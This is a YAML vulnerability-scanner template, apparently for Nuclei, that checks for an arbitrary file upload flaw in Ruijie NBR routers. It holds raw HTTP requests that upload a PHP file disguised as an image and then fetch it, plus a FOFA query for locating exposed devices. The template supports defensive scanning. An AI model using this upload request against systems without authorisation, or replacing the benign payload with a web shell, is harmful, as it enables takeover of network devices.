40 lines
1.5 KiB
YAML
40 lines
1.5 KiB
YAML
id: ruijie-nbr-fileupload
|
|
|
|
info:
|
|
name: Ruijie NBR fileupload.php - Arbitrary File Upload
|
|
author: SleepingBag945
|
|
severity: critical
|
|
description: |
|
|
Ruijie NBR router fileupload.php file has an arbitrary file upload vulnerability. An attacker can upload any file to the server through the vulnerability to obtain server permissions.
|
|
reference:
|
|
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/ruijie-nbr-fileupload.yaml
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
fofa-query: app="Ruijie-NBR路由器"
|
|
tags: ruijie,file-upload,intrusive,nbr
|
|
variables:
|
|
filename: "{{rand_base(6)}}"
|
|
string: "{{rand_base(5)}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /ddi/server/fileupload.php?uploadDir=upload&name={{filename}}.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: text/plain, */*; q=0.01
|
|
Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
|
|
Content-Type: image/jpeg
|
|
|
|
<?php echo "{{string}}"; unlink(__FILE__); ?>
|
|
- |
|
|
GET /ddi/server/upload/{{filename}}.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- status_code_1 == 200 && contains(body_1,"jsonrpc")
|
|
- status_code_2 == 200 && contains(body_2,"{{string}}")
|
|
condition: and
|
|
# digest: 4a0a0047304502205aec15506f551f025b3d99fd40a127b9e9c4787e16d32915d121b954cf089721022100d8fe6d2cbdf3db8ebc017eee812656570ec642c8ae99dea9b26c64c427570fee:922c64590222798bb761d5b6d8e72950 |